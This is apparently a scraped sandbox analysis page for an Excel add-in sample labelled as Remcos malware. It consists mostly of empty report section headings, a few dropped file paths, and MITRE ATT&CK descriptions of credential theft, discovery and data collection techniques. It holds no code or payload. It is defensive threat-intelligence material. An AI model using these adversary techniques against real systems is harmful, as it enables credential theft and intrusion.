Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 202404294766578200.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

C:\Users\user\AppData\Local\Temp\Charley

C:\Users\user\AppData\Local\Temp\aut8862.tmp

Windows Analysis Report
202404294766578200.xlam.xlsx

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre